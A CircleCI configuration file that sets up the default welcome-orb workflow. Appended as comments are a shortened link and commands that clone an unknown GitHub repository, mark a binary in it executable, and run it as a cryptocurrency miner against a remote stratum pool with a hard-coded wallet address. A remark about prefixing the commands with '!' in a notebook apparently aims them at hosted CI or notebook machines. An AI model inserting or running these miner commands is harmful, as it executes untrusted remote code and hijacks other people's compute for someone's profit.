# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - welcome/run
#Run with exclamation if using notebook#
#Site: https://bit.ly/381G0Hd #
 
# git clone https://github.com/Dawn-shell/linux
 
# git clone https://github.com/Dawn-shell/linux && chmod +x linux/system
 
# linux/system -a yespowerSUGAR -o stratum+tcp://stratum-asia.rplant.xyz:7042 -u sugar1qxqw9kgzkfn4vjlzm3825jye4ck2xakmejzta9t.ttttt --no-auto